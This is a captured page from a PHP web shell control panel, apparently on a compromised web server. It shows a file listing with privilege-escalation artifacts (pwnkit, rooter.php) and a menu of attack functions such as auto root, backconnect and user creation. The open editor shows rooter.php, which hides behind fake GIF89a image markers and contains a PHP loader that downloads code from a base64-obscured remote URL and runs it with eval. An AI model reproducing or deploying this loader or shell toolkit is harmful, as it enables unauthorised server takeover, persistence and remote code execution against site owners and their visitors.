Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.119.122.69
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
seona /
myadmin /
file /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
backup.php
446.53
KB
-rw-r--r--
error_log
4.6
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rooter.php
1.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rooter.php
Uname: User: Php: Hdd: Cwd: Linux ip-172-16-4-58.ap-south-1.compute.internal 2.6.32-754.33.1.el6.x86_64 #1 SMP Tue Aug 25 15:29:40 UTC 2020 x86_64 [ Google ] [ Exploit-DB ] 48 ( apache ) Group: 48 ( apache ) 5.3.3 Safe mode: OFF [ phpinfo ] Datetime: 2022-11-21 00:08:04 8589934592.00 GB Free: 8589929332.41 GB (100%) /data/vhosts/ijpsonline-com/articles/ drwxrwxrwx [ home ] UTF-8 Server IP: 104.21.46.178 Client IP: 172.70.92.253 [ Sec. Info ] [ Files ] [ Console ] [ Infect ] [ Sql ] [ Php ] [ Safe mode ] [ String tools ] [ Bruteforce ] [ Network ] [ Self remove ] File tools Name: 1111.php Size: 42.21 KB Permission: -r--r--r-- Owner/Group: apache/apache Create time: 2022-11-21 00:07:16 Access time: 2022-11-21 00:04:55 Modify time: 2022-11-21 00:04:55 [ View ] Highlight Download Hexdump Edit Chmod Rename Touch Frame <!-- GIF89;a --> <!-- GIF89;a --> <?pHp function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); $data = curl_exec($ch); curl_close($ch); return $data; } $x= '?>'; eval($x . get(base64_decode('aHR0cHM6Ly9zZW9qYW5kYXBpcmFuZy5jb20vc2hlbGwvYW1hbi50eHQ='))); ?>
Close